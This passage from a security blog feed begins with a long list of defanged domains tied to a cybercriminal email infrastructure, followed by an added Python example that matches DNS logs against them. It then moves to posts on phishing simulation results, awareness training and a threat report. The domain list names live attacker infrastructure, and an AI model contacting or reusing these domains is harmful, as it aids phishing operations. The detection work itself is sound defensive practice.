esendsstrangeasia[.]us sendsstrangesecuretoday[.]us emailboostgedigital[.]us
emailboostgelife[.]us emailboostgelifes[.]us emailboostgesecureasia[.]us
eontaysstrangeasia[.]us eontaysstrangenetwork[.]us eontaysstrangerocks[.]us
eontaysstrangesecureasia[.]us epropivedsstrangevip[.]us ereplyggstangeasia[.]us
ereplyggstangedigital[.]us ereplyggstangeereplys[.]us ereplyggstangelifes[.]us
ereplyggstangenetwork[.]us ereplyggstangesecureasia[.]us frostsstrangeworld[.]us
servicceivedsstrangevip[.]us servicplysstrangeasia[.]us servicplysstrangedigital[.]us
servicplysstrangelife[.]us servicplysstrangelifes[.]us servicplysstrangenetwork[.]us
ereceivedsstrangesecureworld[.]us ereceivedsstrangetoday[.]us ereceivedsstrangeus[.]us
esendsstrangesecurelife[.]us sendsstrangesecureesendss[.]us ereplysstrangesecureasia[.]us
ereplysstrangesecurenetwork[.]us receivedsstrangesecurelife[.]us ereplysstrangeworld[.]us
reauestysstrangesecurelive[.]us ereceivedsstrangeworld[.]us esendsstrangesecurerocks[.]us
reauestysstrangesecuredigital[.]us reauestysstrangesecurenetwork[.]us reauestysstrangesecurevip[.]us
replysstrangesecurelife[.]us ereauestysstrangesecurerocks[.]us ereceivedsstrangeasia[.]us
ereceivedsstrangedigital[.]us ereceivedsstrangeereceiveds[.]us ereceivedsstrangelife[.]us
ereceivedsstrangelifes[.]us ereceivedsstrangenetwork[.]us ereceivedsstrangerocks[.]us
ereceivedsstrangesecureasia[.]us receivedsstrangeworld[.]us replysstrangedigital[.]us
invdeliverynows[.]us esendsstrangesecuredigital[.]us esendsstrangesecureworld[.]us
sendsstrangesecurenetwork[.]us ereceivedsstrangevip[.]us replysstrangerocs[.]us
replysstrangesecurelive[.]us invpaymentnoweros[.]us invpaymentnowes[.]us
replysstrangeracs[.]us reauestysstrangesecurebest[.]us receivedsstrangesecurebest[.]us
reauestysstrangesecurelife[.]us ereplysstrangevip[.]us reauestysstrangesecuretoday[.]us
ereplysstrangesecureus[.]us ereplysstrangetoday[.]us ereceivedsstrangesecuredigital[.]us
ereceivedsstrangesecureereceiveds[.]us ereceivedsstrangesecurelife[.]us ereceivedsstrangesecurenetwork[.]us
ereceivedsstrangesecurerocks[.]us ereceivedsstrangesecureus[.]us ereceivedsstrangesecurevip[.]us
sendsstrangesecurebest[.]us sendsstrangesecuredigital[.]us sendsstrangesecurelive[.]us
sendsstrangesecureworld[.]us esendsstrangedigital[.]us esendsstrangeesends[.]us
esendsstrangelifes[.]us esendsstrangerocks[.]us esendsstrangesecureasia[.]us
esendsstrangesecureesends[.]us esendsstrangesecurenetwork[.]us esendsstrangesecureus[.]us
esendsstrangesecurevip[.]us esendsstrangevip[.]us ereauestysstrangesecureasia[.]us
ereplysstrangeasia[.]us ereplysstrangedigital[.]us ereplysstrangeereplys[.]us
ereplysstrangelife[.]us ereplysstrangelifes[.]us ereplysstrangenetwork[.]us
ereplysstrangerocks[.]us ereplysstrangesecuredigital[.]us ereplysstrangesecureereplys[.]us
ereplysstrangesecurelife[.]us ereplysstrangesecurerocks[.]us ereplysstrangesecurevip[.]us
ereplysstrangesecureworld[.]us ereplysstrangeus[.]us reauestysstrangesecureclub[.]us
reauestysstrangesecureereauestyss[.]us reauestysstrangesecureworld[.]us receivedsstrangesecureclub[.]us
receivedsstrangesecuredigital[.]us receivedsstrangesecureereceivedss[.]us receivedsstrangesecurelive[.]us
receivedsstrangesecurenetwork[.]us receivedsstrangesecuretoday[.]us receivedsstrangesecurevip[.]us
receivedsstrangesecureworld[.]us replysstrangesecurebest[.]us replysstrangesecureclub[.]us
replysstrangesecuredigital[.]us replysstrangesecureereplyss[.]us replysstrangesecurenetwork[.]us
replysstrangesecuretoday[.]us replysstrangesecurevip[.]us replysstrangesecureworld[.]us
sendsstrangesecurevip[.]us esendsstrangelife[.]us esendsstrangenetwork[.]us
esendsstrangetoday[.]us esendsstrangeus[.]us esendsstrangeworld[.]us
sendsstrangesecureclub[.]us sendsstrangesecurelife[.]us plysstrangelifes[.]us
intulifeinoi[.]us replysstrangerocks[.]us invpaymentnowe[.]us
replysstrangelifes[.]us replysstrangenetwork[.]us invdeliverynowr[.]us
ereceivedggstangevip[.]us ereplyggstangerocks[.]us servicceivedsstrangeworld[.]us
servicplysstrangesecureasia[.]us servicplysstrangeservicplys[.]us emailboostgeasia[.]us
emailboostgeereplys[.]us emailboostgenetwork[.]us emailboostgerocks[.]us
eontaysstrangedigital[.]us eontaysstrangeeontays[.]us eontaysstrangelife[.]us
eontaysstrangelifes[.]us epropivedsstrangeworld[.]us ereceivedggstangeworld[.]us
ereplyggstangelife[.]us frostsstrangevip[.]us servicplysstrangerocks[.]us
invdeliverynow[.]us invpaymentnowlife[.]us invdeliverynowes[.]us
invpaymentnowwork[.]us replysstrangedigitals[.]us replysstrangelife[.]us
replysstrangelifee[.]us replystrangeracs[.]us

RandomU domains

cnewyllansf[.]us kibintiwl[.]us planetezs[.]us sakgeldvi[.]us
rdoowvaki[.]us kabelrandjc[.]us wembaafag[.]us postigleip[.]us
jujubugh[.]us honidefic[.]us utietang[.]us scardullowv[.]us
vorlassebv[.]us jatexono[.]us vlevaiph[.]us bridgetissimema[.]us
schildernjc[.]us francadagf[.]us strgatibp[.]us jelenskomna[.]us
prependerac[.]us oktagonisa[.]us enjaularszr[.]us opteahzf[.]us
skaplyndiej[.]us dirnaichly[.]us kiesmanvs[.]us gooitounl[.]us
izvoznojai[.]us kuphindanv[.]us pluienscz[.]us huyumajr[.]us
arrutisdo[.]us loftinumkx[.]us ffermwyrzf[.]us hectorfranez[.]us
munzoneia[.]us savichicknc[.]us nadurogak[.]us raceaddicteg[.]us
mpixiris[.]us lestenas[.]us collahahhaged[.]us enayilebl[.]us
hotteswc[.]us kupakiliayw[.]us deroutarek[.]us pomagatia[.]us
mizbebzpe[.]us firebrandig[.]us univerzamjw[.]us amigosenrutavt[.]us
kafrdaaia[.]us cimadalfj[.]us ubrzanihaa[.]us yamashumiks[.]us
jakartayd[.]us cobiauql[.]us idiofontg[.]us hoargettattzt[.]us
encilips[.]us dafanapydutsb[.]us intereqr[.]us chestecotry[.]us
diegdoceqy[.]us ffwdenaiszh[.]us sterinaba[.]us wamwitaoko[.]us
peishenthe[.]us hegenheimlr[.]us educarepn[.]us ayajuaqo[.]us
imkingdanuj[.]us dypeplayentqt[.]us traktorkaqk[.]us prilipexr[.]us
collazzird[.]us sentaosez[.]us vangnetxh[.]us valdreska[.]us
mxcujatr[.]us angelqtbw[.]us bescromeobsemyb[.]us hoogametas[.]us
mlitavitiwj[.]us pasgemaakhc[.]us facelijaxg[.]us harukihotarugf[.]us
pasosaga[.]us mashimariokt[.]us vodoclundqs[.]us trofealnytw[.]us
cowboyie[.]us dragovanmm[.]us jonuzpura[.]us cahurisms[.]us
leetzetli[.]us jonrucunopz[.]us flaaksik[.]us wizjadne[.]us
zatsopanogn[.]us roblanzq[.]us barbwirelx[.]us givolettoan[.]us
gyfarosmt[.]us zastirkjx[.]us sappianoyv[.]us noneedfordayvnb[.]us
andreguidiao[.]us concubinsel[.]us meljitebj[.]us alcalizezsc[.]us
springenmw[.]us kongovkamev[.]us starlitent[.]us cassineraqy[.]us
ariankacf[.]us plachezxr[.]us abulpasastq[.]us scraithehk[.]us
wintertimero[.]us abbylukis[.]us lumcrizal[.]us trokrilenyr[.]us
skybdragonqx[.]us pojahuez[.]us rambalegiec[.]us relucrarebk[.]us
vupardoumeip[.]us punicdxak[.]us vaninabaranaogw[.]us yesitsmeagainle[.]us
upcominge[.]us arwresaub[.]us zensimup[.]us joelstonem[.]us
ciflaratzz[.]us adespartc[.]us maaltijdr[.]us acmindiaj[.]us
mempetebyj[.]us itorandat[.]us galenicire[.]us cheldisalk[.]us
zooramawpreahkt[.]us sijamskojoc[.]us fliefedomrr[.]us ascenitianyrg[.]us
tebejavaaq[.]us finnerssshu[.]us slimshortyub[.]us angstigft[.]us
avedaviya[.]us aasthakathykh[.]us nesklonixt[.]us drywelyza[.]us
paginomxd[.]us gathesitehalazw[.]us antinodele[.]us ferestat[.]us
tianaoeuat[.]us pogilasyg[.]us mjawxxik[.]us bertolinnj[.]us
auswalzenna[.]us mmmikeyvb[.]us megafonasgc[.]us litnanjv[.]us
boockmasi[.]us andreillazf[.]us vampirupn[.]us lionarivv[.]us
ihmbklkdk[.]us okergeeliw[.]us forthabezb[.]us trocetasss[.]us
kavamennci[.]us mipancepezc[.]us infuuslx[.]us dvodomnogeg[.]us
zensingergy[.]us eixirienhj[.]us trapunted[.]us greatfutbolot[.]us
porajskigx[.]us mumbleiwa[.]us cilindrarqe[.]us uylateidr[.]us
sdsandrahuin[.]us trapeesr[.]us trauttbobw[.]us bostiwro[.]us
niqiniswen[.]us ditionith[.]us folseine[.]us zamoreki[.]us
sonornogae[.]us xlsadlxg[.]us varerizu[.]us seekabelv[.]us
nisabooz[.]us pohvalamt[.]us inassyndr[.]us ivenyand[.]us
karbonsavz[.]us svunturc[.]us babyrosep[.]us aardigerf[.]us
fedrelandx[.]us degaeriah[.]us detidiel[.]us acuendoj[.]us
peludine[.]us impermatav[.]us datsailis[.]us melenceid[.]us
beshinon[.]us dinangnc[.]us fowiniler[.]us laibstadtws[.]us
bischerohc[.]us muctimpubwz[.]us jusidalikan[.]us peerbalkw[.]us
robesikaton[.]us thabywnderlc[.]us osoremep[.]us krlperuoe[.]us
ntarodide[.]us bideoskin[.]us senagena[.]us kelyldori[.]us
kawtriatthu[.]us rbreriaf[.]us enaqwilo[.]us monesine[.]us
onwinaka[.]us yonhydro[.]us siostailpg[.]us bannasba[.]us
milosnicacz[.]us tunenida[.]us sargasseu[.]us malayabc[.]us
prokszacd[.]us premarketcl[.]us zedyahai[.]us xinarmol[.]us
minttaid[.]us pufuletzpb[.]us nekbrekerdv[.]us ppugsasiw[.]us
katarkamgm[.]us kyraidaci[.]us falhiblaqv[.]us lisusant[.]us
mameriar[.]us quslinie[.]us nirdorver[.]us trocairasec[.]us
pochwikbz[.]us ingykhat[.]us okrzynjf[.]us razsutegayl[.]us
dimbachzx[.]us buchingmc[.]us iessemda[.]us fatarelliqi[.]us
efetivumd[.]us vdevicioik[.]us klumppwha[.]us stefiensi[.]us
donetzbx[.]us wetafteto[.]us denementnd[.]us cyllvysr[.]us
viweewmokmt[.]us destescutyi[.]us craulisrt[.]us maggiebagglesxt[.]us
yawapasaqi[.]us spimilatads[.]us paseadoryy[.]us apageyantak[.]us
magicofaloeaj[.]us prefatoryhe[.]us statvaiq[.]us piketuojaqk[.]us
mushipotatobt[.]us suergonugoy[.]us gummiskoxt[.]us torunikc[.]us
adoleishswn[.]us rovljanie[.]us ivicukfa[.]us vajarelliwe[.]us
burksuit[.]us adoraableio[.]us bassettsz[.]us chevyguyxq[.]us
lunamaosa[.]us telemovelmi[.]us pimptazticui[.]us posteryeiq[.]us
miriamloiso[.]us salahlekajl[.]us inveshilifj[.]us alquicelbi[.]us
hitagjafirt[.]us ohatranqm[.]us scosebexgofxu[.]us vivalasuzyygb[.]us
lugleeghp[.]us alicuppippn[.]us wedutuanceseefv[.]us abnodobemmn[.]us
zajdilxtes[.]us inhaltsqxw[.]us rejtacdat[.]us contunaag[.]us
pitajucmas[.]us delopezmc[.]us donjimafx[.]us iheartcoxlc[.]us
rommelcrxgi[.]us jorguetky[.]us jadesellvb[.]us fintercentrosfs[.]us
ralbarix[.]us kynnirinnty[.]us bibulbio[.]us aspazjagh[.]us
gleboqrat[.]us tensinory[.]us usitniterx[.]us zaretkyui[.]us
hentugustqy[.]us surigatoszuk[.]us nitoeranybr[.]us spitzkopuo[.]us
podkarpatruszz[.]us milfincasqo[.]us datatsbjew[.]us changotme[.]us
losbindebt[.]us ninjachuckvb[.]us desfadavacp[.]us potkazatiun[.]us
sernakct[.]us razmersat[.]us purtinaah[.]us ampiovfa[.]us
durstinyskv[.]us kreukenct[.]us shinanyavc[.]us kolaryta[.]us
yangtsekk[.]us voyagedeviema[.]us elblogdelld[.]us utiligijc[.]us
peaplesokqo[.]us jenggoteq[.]us dogliairler[.]us kandizifb[.]us
flunkmasteraz[.]us clewpossejj[.]us hymgaledaja[.]us gmckayar[.]us
fagordul[.]us pnendickhs[.]us arrogede[.]us stilenii[.]us
cafelireao[.]us poishiuuz[.]us nonfunccoupyo[.]us madrigalbta[.]us
tarad[.]us sarahcp[.]us wickyjr[.]us ghadrn[.]us
sirvond[.]us qumarta[.]us verow[.]us mondeki[.]us
lirana[.]us niarvi[.]us belena[.]us qucono[.]us
ulianag[.]us lenut[.]us shivave[.]us jendone[.]us
seddauf[.]us jarare[.]us uchar[.]us ealesa[.]us
wyoso[.]us marnde[.]us thiath[.]us aulax[.]us
bobelil[.]us jestem[.]us detala[.]us phieyen[.]us
annazo[.]us dilen[.]us jelan[.]us ipedana[.]us
keulsph[.]us ztereqm[.]us rinitan[.]us natab[.]us
haritol[.]us ricould[.]us lldra[.]us miniacs[.]us
zahrajr[.]us cayav[.]us pheduk[.]us qugagad[.]us
dehist[.]us letama[.]us mencyat[.]us vindae[.]us
uranc[.]us handil[.]us galezay[.]us bamerna[.]us
yllyn[.]us ckavl[.]us ilalie[.]us daellee[.]us
cuparoc[.]us zelone[.]us burnile[.]us uloryrt[.]us
shexo[.]us phalbe[.]us hanolen[.]us lorria[.]us
beten[.]us xuserye[.]us iclelan[.]us cwokas[.]us
vesic[.]us ontolan[.]us wajdana[.]us telama[.]us
missani[.]us usinaye[.]us ertanom[.]us kericex[.]us
denaga[.]us tyderq[.]us seliza[.]us kinnco[.]us
qurtey[.]us arzenitlu[.]us vellpoildzu[.]us keityod[.]us
ltangerineldf[.]us lizergidft[.]us serrucheah[.]us lolricelolad[.]us
expiantaszg[.]us hljqfyky[.]us abarrosch[.]us lepestrinynr[.]us
elektroduendevq[.]us waggonbauwh[.]us chaquetzgg[.]us revizijiqa[.]us
ziggyiqta[.]us rokenounkaf[.]us lottemanvl[.]us corsetatsvp[.]us
extasiatny[.]us darkinjtat[.]us pastorsta[.]us sategnaxf[.]us
mordiquedp[.]us mogulanbub[.]us aleesexx[.]us strekktumgz[.]us
kresanike[.]us oberhirtesn[.]us wyddiongw[.]us etherviltjd[.]us
gdinauq[.]us tumisolcv[.]us oardbzta[.]us zamislimrx[.]us
tidifkil[.]us anwirbtda[.]us breliaattainoqt[.]us steinzeitps[.]us
grafoay[.]us shuramiok[.]us sanarteau[.]us jerininomgv[.]us
kusturirp[.]us tenisaragonpu[.]us terquezajf[.]us remularegf[.]us
nobanior[.]us julijmc[.]us dekrapp[.]us odaljenakd[.]us
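The domain list above is most useful when it can be matched against an environment's own resolver or proxy logs. The following Python is an added example, not code from the Microsoft post: it refangs a constructed excerpt of the indicators above and checks constructed DNS query log lines (a BIND-style query-log layout is assumed) against them, matching on the registered domain so that subdomains of an indicator are caught while look-alike names are not.

```python
"""Check DNS query logs against the defanged domain indicators listed above.

Added example, not code from the Microsoft post. The indicator excerpt reuses
a few domains from the list above; the DNS log lines and the BIND-style
query-log layout they follow are constructed for this example.
"""
import re

# Constructed excerpt: a few of the defanged indicators from the list above.
INDICATOR_TEXT = """
tarad[.]us sarahcp[.]us wickyjr[.]us ghadrn[.]us
zensingergy[.]us eixirienhj[.]us trapunted[.]us greatfutbolot[.]us
"""

# Constructed DNS query log lines (BIND querylog layout is assumed).
SAMPLE_DNS_LOG = """\
01-Feb-2021 10:02:11.301 client 10.1.4.22#51234: query: www.microsoft.com IN A + (10.1.0.5)
01-Feb-2021 10:02:12.118 client 10.1.4.22#51240: query: mail.tarad.us IN A + (10.1.0.5)
01-Feb-2021 10:02:13.004 client 10.1.7.90#40001: query: trapunted.us IN MX + (10.1.0.5)
01-Feb-2021 10:02:14.777 client 10.1.7.90#40002: query: nottarad.us IN A + (10.1.0.5)
01-Feb-2021 10:02:15.002 client 10.1.9.13#60011: query: update.example.org IN AAAA + (10.1.0.5)
"""

# Common defanging conventions: "[.]" or "(.)" for dots, "hxxp" for http.
DEFANG_RULES = (("[.]", "."), ("(.)", "."), ("hxxps://", "https://"), ("hxxp://", "http://"))


def refang(token):
    """Turn a defanged indicator back into its real form."""
    for defanged, real in DEFANG_RULES:
        token = token.replace(defanged, real)
    return token


def load_indicators(text):
    """Parse whitespace-separated defanged domains into a set of lowercase domains."""
    return {refang(tok).lower().strip(".") for tok in text.split() if tok.strip()}


QUERY_RE = re.compile(r"client (?P<client>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\w+)")


def matching_indicator(qname, indicators):
    """Return the indicator that qname equals or sits under, else None.

    Walking the label chain means 'mail.tarad.us' matches 'tarad.us' while
    'nottarad.us' does not; a plain substring test would wrongly flag the latter.
    """
    labels = qname.lower().strip(".").split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in indicators:
            return candidate
    return None


def scan_dns_log(log_text, indicators):
    """Return one hit per log line whose queried name is covered by an indicator."""
    hits = []
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        ioc = matching_indicator(m.group("qname"), indicators)
        if ioc:
            hits.append({
                "client": m.group("client"),
                "qname": m.group("qname"),
                "qtype": m.group("qtype"),
                "indicator": ioc,
            })
    return hits


if __name__ == "__main__":
    iocs = load_indicators(INDICATOR_TEXT)
    for hit in scan_dns_log(SAMPLE_DNS_LOG, iocs):
        print(f"{hit['client']} queried {hit['qname']} ({hit['qtype']}) -> indicator {hit['indicator']}")
```

Feeding the full list into `load_indicators` and a day of resolver logs into `scan_dns_log` gives the set of internal clients that resolved any of these domains; the MX lookup in the sample is the kind of hit a mail server makes when it is about to relay to attacker infrastructure, which is worth triaging separately from a browser-originated A query.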

 

The post What tracking an attacker email infrastructure tells us about persistent cybercriminal operations appeared first on Microsoft Security.

Terranova Security Gone Phishing Tournament reveals continued weak spot in cybersecurity

December 16th, 2020 No comments

The Terranova Security annual Gone Phishing Tournament™ wrapped up in October 2020, spanning 98 countries and industries including healthcare, consumer goods, transport, energy, IT, finance, education, manufacturing, and more. Using templates that Microsoft Security created from actual phishing attacks, Terranova Security Awareness Training draws on principles of behavioral science to create content that changes user behavior. True to our mission, this year’s results reveal a lot about the state of cybersecurity at the human level—your organization’s first line of defense.

Tournament results

Terranova Security’s Gone Phishing Tournament is a free, annual cybersecurity event that takes place in October to coincide with National Cybersecurity Awareness Month. The Tournament tests real-world responses using a phishing email modeled on actual threats provided by Attack Simulation Training in Microsoft Defender for Office 365 (Office 365 Advanced Threat Protection). Click rates are segmented by industry, organization size, region, web browser, and operating system.

Using a template created from real phishing attacks, translated into 11 languages across 98 countries, the 2020 Gone Phishing Tournament revealed that organizations are taking phishing threats seriously, but with mixed results.

“There’s increasing crossover between our personal and work activities online. That’s why cybersecurity education and training needs to be an ongoing commitment.”—Vasu Jakkal, CVP, Security, Compliance and Identity Marketing, Microsoft

Figure 1: Password submission by industry

The average password submission rate across industries was 13.4 percent, with education employees taking the bait least often at just 7.9 percent. The highest password submission rate was among public sector employees at 20.7 percent.

Figure 2: Click and password submission rates by the size of the organization

The tournament results also showed there was not a great deal of variation when comparing organizations of varied sizes. For example, there was only a 9.2 percent difference in the number of people who clicked the phishing link and submitted passwords at organizations of fewer than 100 people, compared with those consisting of more than 3,000 employees. The results show that phishing attacks are not just a threat for smaller organizations with less sophisticated cybersecurity training—large organizations were even more vulnerable.

Ongoing attacks

In the new world of remote work, your people are your perimeter. Phishing provides hackers with a low-cost, low-risk form of social engineering with a potentially big payoff in the form of stolen passwords, leaked credentials, and access to sensitive data and intellectual property. Throughout 2020, opportunistic cybercriminals have been preying on distracted, overstressed remote workers by introducing COVID-19-themed phishing lures. The World Health Organization (WHO) has referred to the ongoing COVID-19 themed phishing attacks as an “infodemic.” By the summer of 2020, the Federal Trade Commission (FTC) had already recorded over 59,000 coronavirus or stimulus-related complaints resulting in over $74 million in losses.

The National Cyber Security Alliance (NCSA) is pushing back against the rise in cybercrime by building strong public and private partnerships that empower users to stay secure online.

“The Phishing Benchmark Global Report reinforces the need for the current work being done by organizations like Microsoft, Terranova Security, and the National Cyber Security Alliance. Real-world phishing simulations and engaging security awareness training help make organizations, employees, and everyday citizens aware of the growing risk of social engineering and phishing emails. We will continue working in partnership with industry and government to empower the global community towards becoming one that is more cyber aware.”—Kelvin Coleman, Executive Director of NCSA

Not all security awareness training is alike

To defend against increasingly sophisticated cyber threats, organizations need real-world training delivered as a comprehensive internal campaign. Terranova Security Awareness Training includes gamification and interactive sessions designed to engage users, and it can be localized for different geographies around the world.

Attack Simulation Training in Microsoft Defender for Office 365, delivered in partnership with Terranova Security, integrates simulations, training, and reporting. Terranova Security is excited to partner with Microsoft to deliver this differentiated, industry-leading solution, allowing our customers to detect, prioritize, and remediate phishing risk across their organizations. With Attack Simulation Training, customers can:

  • Simulate real threats: Detect vulnerabilities with real lures and templates—automatically or manually send employees the phishing emails attackers have used against your organization. Then, reach out to users who fall for a phishing lure with personalized training content.
  • Remediate intelligently: Quantify social engineering risks across employees and threat vectors to prioritize remedial training. Track your organization’s progress against a baseline and measure the behavioral impacts. User susceptibility metrics trigger automated repeat-offender simulations and training for people who need extra attention.
  • Improve security posture: Reinforce your human security system with targeted training designed to change employee behavior. Training can be customized and localized, including simulations tailored to your employees’ contexts—region, industry, function—with granular conditionality on harvesting. Cater to diverse learning styles with interactive nano-learning and micro-learning content.

If there is a common thread to be found in this year’s Gone Phishing Tournament results, it is that organizations of every size need to make integrated attack simulation and training a cornerstone of their cybersecurity program. Cybercriminals do not take days off, and neither should your simulation and training program.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Terranova Security Gone Phishing Tournament reveals continued weak spot in cybersecurity appeared first on Microsoft Security.

Why integrated phishing-attack training is reshaping cybersecurity—Microsoft Security

October 5th, 2020 No comments

Phishing is still one of the most significant risk vectors facing enterprises today. Innovative email security technology like Microsoft Defender for Office 365 stops a majority of phishing attacks before they hit user inboxes, but no technology in the world can prevent 100 percent of phishing attacks from hitting user inboxes. At that point, your employees become your defenders. They must be trained to recognize and report phishing attacks. But not all training is equally effective.

This blog examines the current state of security awareness training, including how you can create an intelligent solution to detect, analyze, and remediate phishing risk. You’ll also learn about an upcoming event to help you get data-driven insights to compare your current phishing risk level against your peers.

A new reality for cybersecurity

The Chief Information Security Officer (CISO) at a modern enterprise must contend with a myriad of threats. The hybrid mix of legacy on-premises systems and cloud solutions, along with the proliferation of employee devices and shadow IT, means your security team needs a new and comprehensive view of phishing risk across the organization. Self-reported training completion metrics don’t provide insight into behavior changes or risk reduction, leading CISOs to distrust them. Improvement in employee behavior becomes difficult to measure, leaving CISOs uncertain whether employee behavior has improved at all.

Many information workers view security awareness training as a tedious interruption that detracts from productivity. Often when an employee is compromised during a simulated attack, they find the ensuing training to be punitive and navigate away from the training like nothing happened. Worse, simulations are often out-of-context and don’t make sense for the employee’s industry or function.

People-centric protection

Making secure behaviors a part of people’s daily habits requires a regular program of targeted education combined with realistic simulations. That means regular breach and attack simulations against endpoints, networks, and cloud security controls. Microsoft Defender for Office 365 now features simulations to help you detect and remediate phishing risks across your organization. Attack Simulation Training in Microsoft Defender for Office 365, delivered in partnership with Terranova Security, helps you gain visibility into organizational risk, baseline against predicted compromise rates, and prioritize remediations. To learn more about this capability, watch the product launch at Microsoft Ignite 2020.

Terranova Security employs a pedagogical approach to cybersecurity, including gamification and interactive sessions designed to engage users’ interest. The simulations are localized for employees around the world and follow the Web Content Accessibility Guidelines (WCAG) 2.1. You will be able to measure employee behavior changes and deploy an integrated, automated security awareness program built on three pillars of protection:

  • Simulate real threats: Detect vulnerabilities by using real lures (actual phishing emails) and templates, training employees on the most up-to-date threats. Administrators can automate and customize simulations, including payload attachment, user targeting, scheduling, and cleanup. Azure Active Directory (AAD) groups automate user importing, and the vast library of training content enables personalized training based on a user’s vulnerability score or simulation performance.
  • Remediate intelligently: Quantify your social engineering risk across employees and threat vectors to accurately target remedial training. Measure the behavioral impact and track your organization’s progress against a baseline compromise rate. Set up automated repeat offender simulations with the user susceptibility metric and add context by correlating behavior with a susceptibility score.
  • Improve your security posture: Reinforce your human security system with hyper-targeted training designed to change employee behavior. Attack Simulation Training in Microsoft Defender for Office 365 provides nano learnings and micro learnings to cater to diverse learning styles and reinforce awareness.

Check your threat level

Coinciding with National Cyber Security Awareness Month (NCSAM), Terranova will release the results of the Terranova Security Gone Phishing Tournament™ at the end of October. This popular event helps security leaders get an up-to-the-minute picture of their organization’s phishing click rate. Terranova launched this campaign back in August, supplying a free phishing simulation for its applicants and enabling them to benchmark themselves against their peers with accurate click-rate data for comparison.

Co-sponsored by Microsoft, the Terranova Security Gone Phishing Tournament uses an email template from Attack simulation training—a new capability of Office 365 ATP releasing later this year—that acts as an intelligent social engineering risk management tool using context-aware simulations and targeted training.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Why integrated phishing-attack training is reshaping cybersecurity—Microsoft Security appeared first on Microsoft Security.

Microsoft Digital Defense Report 2020: Cyber Threat Sophistication on the Rise

September 29th, 2020 No comments

Today, Microsoft is releasing a new annual report, called the Digital Defense Report, covering cybersecurity trends from the past year. This report makes it clear that threat actors have rapidly increased in sophistication over the past year, using techniques that make them harder to spot and that threaten even the savviest targets. For example, nation-state actors are engaging in new reconnaissance techniques that increase their chances of compromising high-value targets, criminal groups targeting businesses have moved their infrastructure to the cloud to hide among legitimate services, and attackers have developed new ways to scour the internet for systems vulnerable to ransomware.

In addition to attacks becoming more sophisticated, threat actors are showing clear preferences for certain techniques, with notable shifts towards credential harvesting and ransomware, as well as an increasing focus on Internet of Things (IoT) devices. Among the most significant statistics on these trends:

  • In 2019 we blocked over 13 billion malicious and suspicious mails, out of which more than 1 billion were URLs set up for the explicit purpose of launching a phishing credential attack.
  • Ransomware is the most common reason behind our incident response engagements from October 2019 through July 2020.
  • The most common attack techniques used by nation-state actors in the past year are reconnaissance, credential harvesting, malware, and Virtual Private Network (VPN) exploits.
  • IoT threats are constantly expanding and evolving. The first half of 2020 saw an approximate 35% increase in total attack volume compared to the second half of 2019.

Given the leap in attack sophistication in the past year, it is more important than ever that we take steps to establish new rules of the road for cyberspace; that all organizations, whether government agencies or businesses, invest in people and technology to help stop attacks; and that people focus on the basics, including regular application of security updates, comprehensive backup policies, and, especially, enabling multi-factor authentication (MFA). Our data shows that enabling MFA would alone have prevented the vast majority of successful attacks.

To read the full blog and download the Digital Defense Report, visit the Microsoft On the Issues blog.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Microsoft Digital Defense Report 2020: Cyber Threat Sophistication on the Rise appeared first on Microsoft Security.

Microsoft Security: 6 tips for enabling people-centric cybersecurity with security training

September 24th, 2020 No comments

Everyone knows about phishing scams, and most of us think we’re too smart to take the bait. Our confidence often reaches superhero levels when we’re logged onto a company network. As Chief Security Advisor for Microsoft, and previously at telco Swisscom, it’s my business to understand how well employees adapt security training into their daily routines. Years of experience have taught me there are commonalities in human behavior that cut across all levels of an organization. Above all, people want to trust the company they work for and the communications they receive. It’s our task to help them understand that yes, their employer is looking out for them, but they also need to be vigilant to protect themselves and their company’s private data.

Tip #1: Make it fun. That means creating training modules that people will actually want to watch. Think of your favorite TV shows. There’s a reason you want to binge every episode. You care about the characters, or you’re at least interested in how their dilemmas work out. A good example is the Fox TV show 24; every episode was one hour in an unfolding storyline with high stakes. Your training program doesn’t need life-or-death consequences, but it should give people a reason to watch beyond just checking a box for compliance.

Tip #2: Make it easy. Your end user is your customer, so you need their buy-in. When investigating new security solutions, I ask: “Could you explain how this works to my mother in thirty minutes or less?” If not, it’s probably not a user-friendly solution. Asking people to create a password with 20 characters consisting of random symbols, cases, and numbers (that they shouldn’t write down) is not easy. For a better option, try the passwordless authentication options for Azure Active Directory. If your organization has Microsoft Defender for Office 365 Plan 2, which includes Threat Investigation and Response capabilities, you can employ Attack Simulator in the Security & Compliance Center to run realistic scenarios. These simulated attacks can help you easily identify vulnerable users before a real attacker comes knocking.

Tip #3: Focus on your highest risk. Nearly one in three security breaches starts with a phishing attack costing the affected organization an average of USD1.4 million. Even after security training, employees still click on phishing links at an average rate of 20 – 30 percent. With the rise in people working from home, new forms, such as consent phishing, have cropped up to take advantage of new vulnerabilities. Direct your resources to where the people in your organization can see the risk is real, and you’ll generate positive engagement.

Tip #4: Be transparent about breaches. No organization can claim 100 percent invulnerability. Let people know they are the first line of defense. Communicating with staff when a successful attack occurs will help them remain alert. It’s okay to provide examples as long as you don’t reveal so much information that it’s obvious who clicked on that fake Zoom invitation. Be careful not to treat employees like children. They need to own their own actions, but shaming won’t make your organization safer.

Tip #5: Avoid a compliance-only mindset. Yes, that once-a-year cybersecurity training your people dutifully click through meets the organizational requirement. But gaining employee buy-in means doing more than just checking the box. Schedule a refresher course after a breach, even if the victim happens to be another company. Creating a security program that’s fun and engaging will probably cost more, but ask yourself how high the costs from downtime and lost productivity from a major breach would run. Better to invest those funds in protection upfront.

Tip #6: Communicate and educate continuously. Make security news part of your normal staff communications. Talk to your people about the headline-making hacks that target large corporations and government agencies, as well as the smaller identity theft and payment-app scams we all contend with. Talk about supply chain security and the dangers of using unauthorized devices and shadow IT. Cybersecurity threats can feel overwhelming and scary. Communication helps demystify those threats and makes employees feel empowered to protect themselves and their organizations.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

